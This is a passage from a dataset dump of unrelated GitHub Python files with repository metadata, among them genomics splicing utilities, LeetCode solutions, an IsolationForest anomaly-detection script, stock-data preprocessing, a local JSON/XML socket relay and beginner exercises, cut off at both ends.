N: \"))\n\nH = 0\n\n# Variável i começa em i e vai até N.\n# Como range não conta a variável N, soma-se 1 à ela.\nfor i in range(1, N + 1):\n H += 1 / i\n\nprint(H)\n","repo_name":"howbootcamps/pythoncodigos","sub_path":"Exercícios/Gabaritos/05-laço-repetição/exercicio06.py","file_name":"exercicio06.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"pt","doc_type":"code","stars":29,"dataset":"github-code","pt":"75"} +{"seq_id":"36890223470","text":"import pandas as pd\nimport numpy as np\nfrom pyranges import PyRanges\nimport pathlib\nfrom kipoiseq import Interval\nfrom kipoiseq.extractors.vcf import MultiSampleVCF\nfrom kipoiseq.extractors.vcf_query import BaseVariantQuery\nfrom collections import namedtuple\nfrom typing import List\n\n\ndef get_abs_max_rows(df, groupby, max_col, dropna=True):\n return df.reset_index() \\\n .sort_values(by=max_col, key=abs, ascending=False) \\\n .drop_duplicates(subset=groupby) \\\n .set_index(groupby)\n \ndef expit(x):\n return 1. / (1. + np.exp(-x))\n\n\ndef delta_logit_PSI_to_delta_PSI(delta_logit_psi, ref_psi,\n genotype=None, clip_threshold=0.001):\n ref_psi = clip(ref_psi, clip_threshold)\n pred_psi = expit(delta_logit_psi + logit(ref_psi))\n\n if genotype is not None:\n pred_psi = np.where(np.array(genotype) == 1,\n (pred_psi + ref_psi) / 2,\n pred_psi)\n\n return pred_psi - ref_psi\n\n\ndef clip(x, clip_threshold=0.01):\n return np.clip(x, clip_threshold, 1 - clip_threshold)\n\n\ndef logit(x, clip_threshold=0.01):\n x = clip(x, clip_threshold=clip_threshold)\n return np.log(x) - np.log(1 - x)\n\n\ndef normalize_gene_annotation(df, gene_map, key='gene_name', value='gene_id'):\n if isinstance(gene_map, dict):\n pass\n elif isinstance(gene_map, pathlib.PosixPath) or isinstance(gene_map, str):\n gene_map = read_csv(gene_map)\n gene_map = dict(zip(gene_map[key], gene_map[value]))\n elif isinstance(gene_map, pd.DataFrame):\n gene_map = dict(zip(gene_map[key], gene_map[value]))\n else:\n TypeError(\"gene_mapping needs to be dictionary, pandas DataFrame or path\")\n df[value] = df[key].map(gene_map)\n return df\n\n\ndef read_csv(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n return path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n return pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n return pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n return pd.read_parquet(path, **kwargs)\n else:\n raise ValueError(\"unknown file ending.\")\n \n \ndef filter_samples_with_RNA_seq(df, samples_for_tissue):\n \"\"\"\n samples_for_tissue: Dict, keys: tissue, values: samples with RNA-seq for respective tissue\n \"\"\"\n l = list()\n for tissue, samples in samples_for_tissue.items():\n df_with_RNA = df[(df['tissue'] == tissue) & (df['sample'].isin(samples))]\n l.append(df_with_RNA)\n return pd.concat(l)\n\n\ndef inject_new_row(df, new_row_dict):\n new_row = pd.DataFrame(df[-1:].values, columns=df.columns)\n for k,v in new_row_dict.items():\n new_row[k] = v\n return pd.concat([df, new_row])\n\n\ndef read_spliceai(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n return path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n return pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n return pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n return pd.read_parquet(path, **kwargs)\n elif path.suffix.lower() == '.vcf' or str(path).endswith('.vcf.gz'):\n return read_spliceai_vcf(path)\n else:\n raise ValueError(\"unknown file ending.\")\n\n\ndtype_columns_spliceai = {\n 'variant': pd.StringDtype(), \n 'gene_name': pd.StringDtype(), \n 'delta_score': 'float64',\n 'acceptor_gain': 'float64', \n 'acceptor_loss': 'float64',\n 'donor_gain': 'float64', \n 'donor_loss': 'float64',\n 'acceptor_gain_position': 'Int64',\n 'acceptor_loss_positiin': 'Int64',\n 'donor_gain_position': 'Int64',\n 'donor_loss_position': 'Int64',\n}\n\ndef read_spliceai_vcf(path):\n columns = ['gene_name', 'delta_score',\n 'acceptor_gain', 'acceptor_loss',\n 'donor_gain', 'donor_loss',\n 'acceptor_gain_position',\n 'acceptor_loss_positiin',\n 'donor_gain_position',\n 'donor_loss_position']\n rows = list()\n for variant in MultiSampleVCF(path):\n row_all = variant.source.INFO.get('SpliceAI')\n if row_all:\n for row in row_all.split(','):\n results = row.split('|')[1:]\n results = [0 if e == '.' else e for e in results]\n scores = np.array(list(map(float, results[1:])))\n spliceai_info = [results[0], scores[:4].max(), *scores]\n rows.append({\n **{'variant': str(variant)}, \n **dict(zip(columns, spliceai_info))})\n df = pd.DataFrame(rows)\n \n for col in df.columns:\n if col in dtype_columns_spliceai.keys():\n df = df.astype({col: dtype_columns_spliceai[col]})\n \n return df\n\n\ndef _add_variant_col(row):\n if '#Chrom' in row:\n return str(row['#Chrom']).replace('chr', '') + ':' + str(row['Pos']) + ':' + row['Ref'] + '>' + row['Alt']\n elif 'chrom' in row:\n return str(row['chrom']).replace('chr', '') + ':' + str(row['pos']) + ':' + row['ref'] + '>' + row['alt']\n else:\n raise NotImplementedError()\n\n\ndef _add_variant(df):\n if 'variant' in df.reset_index().columns:\n return df\n else:\n df['variant'] = df.apply(lambda x: _add_variant_col(x), axis=1)\n # df['variant'] = df['variant'].astype(pd.StringDtype())\n return df\n \n \ndef _check_gene_id(df):\n if 'GeneID' in df.columns:\n df = df.rename(columns={'GeneID': 'gene_id'})\n if 'gene_id' not in df.columns:\n raise ValueError(\"Please add gene_id.\")\n return df\n\n \ndef read_cadd_splice(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n df = path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n df = pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n df = pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n df = pd.read_parquet(path, **kwargs)\n else:\n raise ValueError(\"unknown file ending.\")\n df = _add_variant(df)\n df = _check_gene_id(df)\n return df\n\n\ndef read_absplice(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n df = path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n df = pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n df = pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n df = pd.read_parquet(path, **kwargs)\n else:\n raise ValueError(\"unknown file ending.\")\n df = _add_variant(df)\n return df\n\n\ndef annotate_junctions_DROP(df):\n if 'chr' not in df['seqnames'].astype(str).values[0]:\n df['seqnames'] = df['seqnames'].astype(str)\n df['seqnames'] = df['seqnames'].apply(lambda x: 'chr' + x)\n df['junctions'] = df['seqnames'].astype(str) + ':' \\\n + (df['start'] - 1).astype(str) + '-' \\\n + df['end'].astype(str) + ':' \\\n + df['strand'].map(lambda x: x if x == '-' else '+')\n return df\n\n\nclass VariantMafFilter(BaseVariantQuery):\n\n def __init__(self, cutoff, population=None, not_in_population=True):\n self.population = population\n self.cutoff = cutoff\n self.not_in_population = not_in_population\n\n def __call__(self, v):\n if self.population:\n v = str(v)\n return self.population[v] <= self.cutoff \\\n if v in self.population else self.not_in_population\n else:\n return v.source.aaf <= self.cutoff\n\n\nclass PrivateVariantFilter(BaseVariantQuery):\n\n def __init__(self, vcf, max_num_samples=2):\n self.vcf = vcf\n self.max_num_sample = max_num_samples\n\n def __call__(self, v):\n return len(self.vcf.get_samples(v)) <= self.max_num_sample\n\n\nclass ReadDepthFilter(BaseVariantQuery):\n\n def __init__(self, vcf, min_read=10, sample_id=None):\n self.sample_mapping = vcf.sample_mapping\n self.min_read = min_read\n self.sample_id = sample_id\n\n def __call__(self, v):\n gt_depth = v.source.gt_alt_depths\n if self.sample_id:\n depth = gt_depth[self.sample_mapping[self.sample_id]]\n else:\n depth = min(gt_depth)\n return depth >= self.min_read\n\n\nclass GQFilter(BaseVariantQuery):\n\n def __init__(self, vcf, min_GQ=80, sample_id=None):\n self.sample_mapping = vcf.sample_mapping\n self.min_GQ = min_GQ\n self.sample_id = sample_id\n\n def __call__(self, v):\n gt_quals = v.source.gt_quals\n if self.sample_id:\n GQ = gt_quals[self.sample_mapping[self.sample_id]]\n else:\n GQ = max(gt_quals)\n return GQ >= self.min_GQ\n \n \nclass LongVariantFilter(BaseVariantQuery):\n\n def __init__(self, vcf, max_length=10):\n self.vcf = vcf\n self.max_length = max_length\n\n def __call__(self, v):\n v = left_normalized(v)\n length = max(len(v.ref), len(v.alt))\n return length < self.max_length\n \n \nclass Junction(Interval):\n\n @property\n def acceptor(self):\n return self.start if self.strand == '-' else self.end\n\n @property\n def donor(self):\n return self.end if self.strand == '-' else self.start\n\n def dinucleotide_region(self):\n return Interval(self.chrom, self.start, self.start + 2), \\\n Interval(self.chrom, self.end - 2, self.end)\n\n def acceptor_region(self, overhang=(250, 250)):\n return Interval(self.chrom, self.acceptor,\n self.acceptor, strand=self.strand) \\\n .slop(upstream=overhang[0], downstream=overhang[1])\n\n def donor_region(self, overhang=(250, 250)):\n return Interval(self.chrom, self.donor,\n self.donor, strand=self.strand) \\\n .slop(upstream=overhang[0], downstream=overhang[1])\n \n \ndef get_splice_site_intervals(junction, overhang=(250, 250)):\n junction = Junction.from_str(junction) if type(\n junction) == str else junction\n\n acceptor = junction.acceptor_region(overhang=overhang)\n donor = junction.donor_region(overhang=overhang)\n return [acceptor, donor]\n\ndef get_unique_splice_site_intervals_in_event(event, overhang=(250, 250)):\n sites = list()\n for junction in event:\n sites.append(get_splice_site_intervals(junction, overhang))\n sites = [item for sublist in sites for item in sublist]\n sites = list(set(sites))\n return sites\n \ndef intervals_to_pyranges(intervals: List[Interval]) -> PyRanges:\n \"\"\"\n Create pyrange object given list of intervals objects.\n Args:\n intervals: list of interval objects have CHROM, START, END, properties.\n \"\"\"\n import pyranges\n df = pd.DataFrame([\n (\n i.chrom,\n i.start,\n i.end,\n i\n )\n for i in intervals\n ], columns=['Chromosome', 'Start', 'End', 'interval'])\n return pyranges.PyRanges(df)\n","repo_name":"gagneurlab/absplice","sub_path":"absplice/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11725,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"75"} +{"seq_id":"26819016804","text":"import numpy as np\nimport pandas as pd\nimport sys, getopt\n\ncols = ['Map', 'Shield', '# iterations', 'ep_train', 'steps_train', 'coll_train',\n 'acc_0_train', 'inter_0_train', 'acc_1_train', 'inter_1_train']\ndata_cols = ['coll_train', 'acc_0_train', 'inter_0_train', 'acc_1_train', 'inter_1_train']\nbase = ['Map', 'Shield', 'Grid']\nextra = ['std_dev_0', 'std_dev_1', 'mean_acc', 'mean_std']\n\n# parse arguments\ndef get_options(debug=False):\n opts, args = getopt.getopt(\n sys.argv[1:],\n 'f:',\n ['file'],\n )\n\n filename = None\n\n for opt, arg in opts:\n if opt in ('-f', '--file'):\n filename = str(arg)\n if debug:\n print(opt + ': ' + arg)\n\n return filename\n\n\n\ndef process_df(filename):\n\n df = pd.read_csv(filename, index_col=False, usecols=cols, sep='\\t')\n\n print(df)\n\n num_iterations = df['# iterations'].iloc[0]\n num_episodes = df['ep_train'].iloc[0]\n maps = df['Map'].unique()\n\n sum_df = pd.DataFrame(columns=base + data_cols + extra)\n print(sum_df)\n\n row = {}\n row['Shield'] = df['Shield'].iloc[0]\n row['Grid'] = 1 if 'grid' in filename else 0\n\n for m, map in enumerate(maps):\n row['Map'] = map\n\n for e in range(num_episodes):\n for col in data_cols:\n sum = 0\n data = []\n for i in range(num_iterations):\n sum += df[col].iloc[e + i * num_episodes + (num_episodes * num_iterations) * m]\n data.append(df[col].iloc[e + i * num_episodes + (num_episodes * num_iterations) * m])\n\n row[col] = sum / 10.0\n if 'acc' in col:\n row['std_dev_' + col[4:5]] = np.std(data)\n\n sum_df = sum_df.append(row, ignore_index=True)\n\n sum_df['mean_acc'] = sum_df[[data_cols[1], data_cols[3]]].mean(axis=1)\n sum_df['mean_std'] = sum_df[['std_dev_0', 'std_dev_1']].mean(axis=1)\n\n print(sum_df)\n print(sum_df.describe())\n\n new_file = 'graph_data/' + filename[5:-4] + '_'\n # sum_df.to_csv(new_file, encoding='utf-8')\n for map in maps:\n print('---- Saving ' + map)\n temp = sum_df[sum_df['Map'] == map]\n temp.to_csv(new_file+map+'.csv', encoding='utf-8')\n\nif __name__ == \"__main__\":\n filename = get_options(debug=True)\n\n if filename is None:\n print('Error: No path provided \\n')\n exit(1)\n\n else:\n process_df(filename)\n","repo_name":"Alone-668/Shield_MARL","sub_path":"smoothing.py","file_name":"smoothing.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"14066305232","text":"# link: https://leetcode.com/problems/minimize-maximum-of-array/\n\n# binary search \n# time complexity: O(n*log(max(nums)-avg(nums)))\nimport math\nclass Solution:\n def minimizeArrayValue(self, nums: list[int]) -> int:\n def isValid(minVal: int) -> bool:\n space = 0\n for num in nums:\n space += (minVal - num)\n if space < 0:\n return False\n return True\n\n low = math.ceil(sum(nums)//len(nums))\n high = max(nums)\n\n while low < high:\n print(low, high)\n mid = low + (high-low) // 2\n if isValid(mid):\n high = mid\n else:\n low = mid + 1\n\n return low\n\n# prefix sum + greedy\n# time complexity O(n)\nimport math\nclass Solution:\n def minimizeArrayValue(self, nums: list[int]) -> int:\n prefixSum = 0\n minVal = 0\n for i in range(len(nums)):\n prefixSum += nums[i]\n minVal = max(minVal, math.ceil(prefixSum / (i+1)))\n \n return minVal\n","repo_name":"rbrn1999/leetcode-sol","sub_path":"problems/2439. Minimize Maximum of Array.py","file_name":"2439. Minimize Maximum of Array.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7941156253","text":"import sys\nimport ast\nsys.path.append(\"..\")\nfrom Komponente.formatiranje import format\nfrom Komponente.JsonXmlAdapter import to_json_from_xml, to_xml_from_json\nimport socket\n\nTCP_IP = socket.gethostname() #localhost\nTCP_PORT = 5005\nBUFFER_SIZE = 1024\nTCP_PORT2 = 5006\n\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind((TCP_IP, TCP_PORT))\ns.listen(0)\n\ns2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns2.bind((TCP_IP, TCP_PORT2))\ns2.listen(0)\n\nconnClient, addrClient = s.accept()\nprint('Connection address:', addrClient,\"\\n\")\n\nconnAdapter, addrAdapter = s2.accept() \nprint('Connection address:', addrAdapter,\"\\n\")\n\nwhile 1:\n data = connClient.recv(BUFFER_SIZE)\n if not data: \n print(\"Svi zahtevi su obradjeni!\")\n break\n\n j =ast.literal_eval(data.decode('utf-8'))\n z = format(j)\n if(z):\n xml = to_xml_from_json(j)\n print(\"Zahtev klijenta u xml formatu:\")\n print(xml.decode())\n connAdapter.send(xml) \n xmlodgovor = connAdapter.recv(BUFFER_SIZE)\n print(\"Odgovor na klijentov zahtev u xml formatu:\")\n print(xmlodgovor.decode())\n odgovorBytes = to_json_from_xml(xmlodgovor)\n connClient.send(odgovorBytes.encode())\n else:\n badformat = {\n \"status\": \"BAD_FORMAT\",\n \"status_code\": \"5000\", #POPRAVITI\n \"payload\": \"Los zahtev sa klijentske strane\"\n }\n badformatbytes= to_xml_from_json(badformat)\n badformatbytessend =to_json_from_xml(badformatbytes)\n connClient.send(badformatbytessend.encode())\n\nconnAdapter.close()\nconnClient.close()\n","repo_name":"ilicka31/RES-TIM10","sub_path":"Komponente/CommunicationBus.py","file_name":"CommunicationBus.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"70656551601","text":"def greeting():\n\tprint(\"Hello from the greeting function\");\n\n\n# the greeting function just says hello\n# invoke or call the function\ngreeting()\n\n\ndef lanle(zzz=\"batman\"):\n\tprint(\"now we're saying\", zzz, \"from another function\")\n\n\nlanle()\nlanle(\"something completely different\")\nlanle(\"fdhfhdhkfbklfjihfnkdl\")\n\n# variables and scope\nmyNumberVariable = 10\n\n\n#returning values from functions (very powerful)\ndef someMath(num1=2,num2=4):\n\tglobal myNumberVariable\n\n#\n\tmyNumberVariable = num1 + num2\n\treturn num1 + num2\n\tprint(myNumberVariable)\n\nsum = someMath()\nprint(\"we are doing some math and getting\", sum)\n\nsum = someMath(10,15)\nprint(\"another math operation with\", sum, \"as the result\")\n\n\n\n","repo_name":"lanle98/Le_L_Python","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19590101718","text":"'''\n这个iForest算法是刘博士(Fei Tony Liu)在莫纳什大学就读期间由陈开明(Kai-Ming Ting)教授和周志华(Zhi-Hua Zhou)教授指导发表的\n第一个版本是在2008年ICDM上,获得年度最佳论文。\n\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.ensemble import IsolationForest\n\n\n\n\n\n\nplt.rcParams['figure.figsize'] = (40.0, 5.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\nrng = np.random.RandomState(42)\nn_samples=6 #样本总数\n\ndataset = pd.read_csv('../csv/Water Quality Record.csv', header=0, index_col=0, parse_dates=True)\ndata = dataset.values.reshape(-1)\n\nvalues = dataset.values\ngroups = [0, 1, 2, 3]\n# fig, axs = plt.subplots(1)\n\ndf = pd.DataFrame(dataset) # 整体数据的全部字典类型\ndo = df['Dissolved Oxygen'] # 返回溶解氧那一列,用字典的方式\n\nDO = []\nfor i in range(0, len(do)):\n DO.append([do[i]])\nDO = np.array(DO)\n\n\nclf = IsolationForest(random_state=rng, contamination=0.025) #contamination为异常样本比例\nclf.fit(DO)\nitem = clf.decision_function(DO)\n\npre = clf.predict(DO)\nfor i in range(len(pre)):\n if pre[i] == -1:\n pre[i] = 0\n\nprint(roc_auc_score(pre,item))\n\n\n\n# # fit the model\n# clf = IsolationForest(random_state=rng, contamination=0.025) #contamination为异常样本比例\n# clf.fit(DO)\n#\n# DO_copy = DO\n# m = 0\n#\n#\n#\n# pre = clf.predict(DO)\n# for i in range(len(pre)):\n# if pre[i] == -1:\n# plt.scatter(i,DO[i],c='r',linewidths=1)\n# DO_copy = np.delete(DO_copy,i-m,0)\n# print(i)\n# m+=1\n#\n#\n#\n# plt.plot(DO)\n# plt.text(0,2,str(m),ha='left',c='r')\n# plt.show()\n# print(\"\\n\")\n# print(m)\n# print(\"\\n\")\n# print(len(DO_copy))\n# plt.plot(DO_copy)\n# print(DO_copy.shape)\n# plt.show()\n","repo_name":"pengchen233/EEMD-LSTM-Model","sub_path":"OutlierDetection/IF.py","file_name":"IF.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"} +{"seq_id":"8038276015","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : LeetCode_056.py\n# @Author: UpTownCat\n# @Date : 2017/10/4\n\n# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n results = self.handle(intervals)\n results2 = self.handle(results)\n while len(results) != len(results2):\n results = results2\n results2 = self.handle(results)\n results = sorted(results, key = lambda x: x.start)\n return results\n def handle(self, intervals):\n for i in range(0, len(intervals)):\n interval = intervals[i]\n if not interval:\n continue\n j = 0\n for j in range(0, len(intervals)):\n if i == j:\n continue\n interval2 = intervals[j]\n if interval2 and interval2.end < interval.end and interval2.end >= interval.start and interval2.start < interval.start:\n interval.start = interval2.start\n interval2, intervals[j] = None, None\n if interval2 and interval.start >= interval2.start and interval.end <= interval2.end:\n interval.start, interval.end = interval2.start, interval2.end\n interval2, intervals[j] = None, None\n if interval2 and interval.start < interval2.start and interval.end > interval2.end:\n interval2, intervals[j] = None, None\n if interval2 and interval.start < interval2.start and interval2.start <= interval.end:\n interval.end = interval2.end\n interval2, intervals[j] = None, None\n results = list(filter(lambda interval: interval, intervals))\n return results\n# intervals = [Interval(1, 3), Interval(2, 6), Interval(8, 10), Interval(15, 18)]\n# intervals = [Interval(1, 4), Interval(2, 3)]\nlists = [[115,121],[319,325],[30,37],[95,101],[445,452],[125,126],[172,172],[29,32],[443,452],[465,466],[420,424],[79,84],[203,206],[352,352],[472,479],[214,221],[124,127],[326,330],[253,254],[351,359],[359,367],[281,284],[188,190],[86,89],[321,322],[106,110],[237,243],[359,359],[431,432],[353,357],[99,106],[343,348],[452,461],[229,234],[91,93],[255,257],[112,120],[185,188],[51,55],[136,140],[27,30],[318,323],[281,281],[57,59],[241,243],[116,118],[181,183],[119,123],[481,482],[191,195],[485,494],[78,86],[39,45],[103,103],[240,249],[167,174],[334,341],[384,389],[367,371],[328,329],[56,62],[5,13],[460,465],[224,228],[178,185],[70,73],[418,427],[113,121],[117,123],[400,407],[308,317],[476,478],[257,260],[110,116],[7,7],[437,442],[438,443],[5,14],[420,421],[193,201],[201,204],[113,122],[412,419],[429,438],[443,443],[238,239],[249,256],[246,254],[280,288],[335,344],[498,502],[54,60],[419,421],[335,344],[493,501],[289,293],[292,295],[166,172],[482,487],[438,443],[277,285]]\nintervals = []\nfor interval in lists:\n intervals.append(Interval(interval[0], interval[1]))\nsolution = Solution()\n# 193,201],[201,204]\nintervals3 = [Interval(201, 206), Interval(191, 195), Interval(193, 201), Interval(201, 204), Interval(203, 206)]\nfor interval in solution.merge(intervals):\n print(interval.start, interval.end)\n\n\n\n# results = list(sorted(intervals, key = lambda interval: interval.start))\n# for result in results:\n# print(result.start, result.end)\n# map(lambda interval: print('[%d, %d]' % (interval.start, interval.end)), solution.merge(intervals))\n# for interval ins%d]' % (interval.start, interval.end))\n# interval = intervals[2]\n# intervals[2] = None\n# print(interval.start)\n\n # if interval.end >= interval2.start and interval.end < interval2.end and interval.start < interval2.end:\n # interval.end = interval2.end\n # interval2 = None\n # intervals[j] = None\n # if interval2 and interval.start <= interval2.start and interval.end >= interval2.end:\n # interval2 = None\n # intervals[j] = None\n # if interval2 and interval.start >= interval2.start and interval.end <= interval2.end:\n # interval.start = interval2.start\n # interval.end = interval2.end\n # interval2 = None\n # intervals[j] = None\n # if interval2 and interval.start == interval2.end:\n # interval.start = interval2.start\n # interval2 = None\n # intervals[j] = None","repo_name":"UpTownCat/LeetCode","sub_path":"LeetCode_056.py","file_name":"LeetCode_056.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31122072612","text":"import random\nszam1 = random.randint(1,10)\nszam2 = random.randint(1,10)\n\nprint(\"Gondoltam két számra 1 és 10 között.\")\n\n#1\nif (szam1%2==0):\n print(\"Az első szám páros.\")\nelse:\n print(\"Az első szám páratlan.\")\nkerdes1 = input(\"Érdekel, hogy az első szám, amelyre gondoltam, osztható-e 3-mal? (igen/nem)\")\nif kerdes1 == \"igen\":\n if (szam1%3==0):\n print(\"A szám osztható 3-mal.\")\n else:\n print(\"A szám nem osztható 3-mal.\")\nelse:\n print(\"Hát akkor nem.\")\nkerdes2 = input(\"Érdekel az első szám amelyre gondoltam? (igen/nem)\")\nif kerdes2 == \"igen\":\n print(szam1)\nelse:\n print(\"Szóval nem.\")\n\n#2\nif (szam2%2==0):\n print(\"A második szám páros.\")\nelse:\n print(\"A második szám páratlan.\")\nkerdes1 = input(\"Érdekel, hogy a második szám, amelyre gondoltam, osztható-e 3-mal? (igen/nem)\")\nif kerdes1 == \"igen\":\n if (szam2%3==0):\n print(\"A szám osztható 3-mal.\")\n else:\n print(\"A szám nem osztható 3-mal.\")\nelse:\n print(\"Hát akkor nem.\")\nkerdes2 = input(\"Érdekel a második szám amelyre gondoltam? (igen/nem)\")\nif kerdes2 == \"igen\":\n print(szam2)\nelse:\n print(\"Szóval nem.\")","repo_name":"alexgoston/python","sub_path":"random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17838664318","text":"import os\nimport pandas as pd\n\ndef make_train_test_csv(cls, orgin_data_path=None, all_data_path=None, time_step=60):\n \"\"\"\n 制作股票分类数据\n orgin_data_path:原始数据存放路径\n all_data_path:制作成可被算法接收的文件存放路径\n \"\"\"\n basic_path = os.path.dirname(os.path.abspath(__file__))\n # 初始化源文件路径和存储文件路径\n if orgin_data_path is None:\n orgin_data_path = os.path.join(basic_path, \"origin_data.csv\")\n if all_data_path is None:\n all_data_path = os.path.join(basic_path, \"all_data.csv\")\n # 读取原始数据,只保留需要使用的列\n total_data = pd.read_csv(orgin_data_path,\n usecols=[\"open_hfq\", \"high_hfq\", \"low_hfq\", \"close_hfq\", \"turnover\", \"volume\",\n \"cir_market_value\", \"stock_date\", \"stock_num\"])\n # 根据股票代码排序,相同的股票代码按照交易日期排序。\n # inplace参数表示不需要返回排序后的结果,直接覆盖原变量即可\n total_data.sort_values(by=['stock_num', 'stock_date'], inplace=True)\n\n # 根据股票代码分组\n g_stock_num = total_data.groupby(by=[\"stock_num\"])\n # 针对每一组股票,分别计算收益gate,其定义为:(下下一个交易日的开盘价 / 下一个交易日的开盘价) - 1\n # 对gate乘以100,使之变成百分比形式(0.09 -> 9,表示9%)\n # 使用np.round函数保存两位小数,之后的数字丢弃(9.8346474 - > 9.83)\n total_data[\"gate\"] = np.round((100 * (g_stock_num.shift(-2)[\"open_hfq\"] / g_stock_num.shift(-1)[\"open_hfq\"] - 1)),\n 2)\n # 重新调整列的顺序,为接下来处理成输入、输出形式做准备\n total_data = total_data[\n [\"open_hfq\", \"high_hfq\", \"low_hfq\", \"close_hfq\", \"turnover\", \"volume\", \"cir_market_value\", \"gate\", \"stock_date\",\n \"stock_num\"]]\n\n # 将调整列顺序后的代码,重新按照股票代码分组\n g_stock_num = total_data.groupby(by=[\"stock_num\"])\n\n # 拿time_step个交易日的数据(默认为60个交易日),进行标准化\n def func_stand(data_one_stock_num, time_step):\n # 通过apply进入函数内的数据,其股票名为data_one_stock_num.name,类型为pd.dataFrame\n # 即,进入此函数的数据为所有名为data_one_stock_num.name的集合\n # dataFrame.shape:(num , 11), num是这个股票出现的次数\n\n for colu_name in data_one_stock_num.columns:\n if colu_name in [\"gate\", \"stock_date\", \"stock_num\"]:\n continue\n # 只针对输入数据进行标准化,标准化算法为: (原始数据 - 平均值) / 标准差\n # 这里每一次for循环,都拿出了1列数据,针对这一列进行标准化并覆盖原数据\n data_one_stock_num[colu_name] = (\n (data_one_stock_num[colu_name] - data_one_stock_num[colu_name].rolling(time_step).mean()) /\n data_one_stock_num[colu_name].rolling(time_step).std())\n return data_one_stock_num\n\n # 将经过标准化的数据处理成训练集和测试集可接受的形式\n def func_train_test_data(data_one_stock_num, time_step):\n print(\"正在处理的股票代码:code:%06d\" % data_one_stock_num.name)\n\n # 提取输入列(对应train_x)\n data_temp_x = data_one_stock_num[\n [\"open_hfq\", \"high_hfq\", \"low_hfq\", \"close_hfq\", \"turnover\", \"volume\", \"cir_market_value\"]]\n # 提取输出列(对应train_y)\n data_temp_y = data_one_stock_num[[\"gate\", \"stock_date\", \"stock_num\"]]\n data_res = []\n # for循环从time_step - 1开始,因为前time_step - 1个数据不满足time_step条件\n # 例如:time_step为60,即需要60个交易日的数据制成训练集的一个输入,但某只股票因为停牌等原因,只有50个交易日的数据。那么它就可以跳过了,不满足最低数目的要求\n for i in range(time_step - 1, len(data_temp_x.index)):\n data_res.append(data_temp_x.iloc[i - time_step + 1: i + 1].values.reshape(1, time_step * 7).tolist() +\n data_temp_y.iloc[i][[\"gate\", \"stock_date\", \"stock_num\"]].values.reshape(1, 3).tolist())\n if len(data_res) != 0:\n # 使用末尾添加的形式,将各个股票的数据依次添加进设定的路径中。\n # index参数表示是否需添加一列序号,header表示是否需要添加列头,mode表示选择哪一种模型进行csv操作(类似于open函数的模型)\n pd.DataFrame(data_res).to_csv(all_data_path, index=False, header=False, mode=\"a\")\n return data_one_stock_num\n\n # 数据标准化\n data_after_stand = g_stock_num.apply(func_stand, time_step=time_step)\n data_after_stand.dropna(inplace=True)\n # 将数据转成训练集合的形式\n g_stock_num = data_after_stand.groupby(by=[\"stock_num\"])\n # 清空接收路径下的文件,初始化列名\n pd.DataFrame({\"0\": [], \"1\": []}).to_csv(all_data_path, index=False)\n g_stock_num.apply(func_train_test_data, time_step=time_step)","repo_name":"busizshen/tusharetest","sub_path":"tushareTest/oneTick4.py","file_name":"oneTick4.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"37062854221","text":"import csv\n\nresultdir = '../CSV_data/'\n\nTHI_DAT = {}\n\nwith 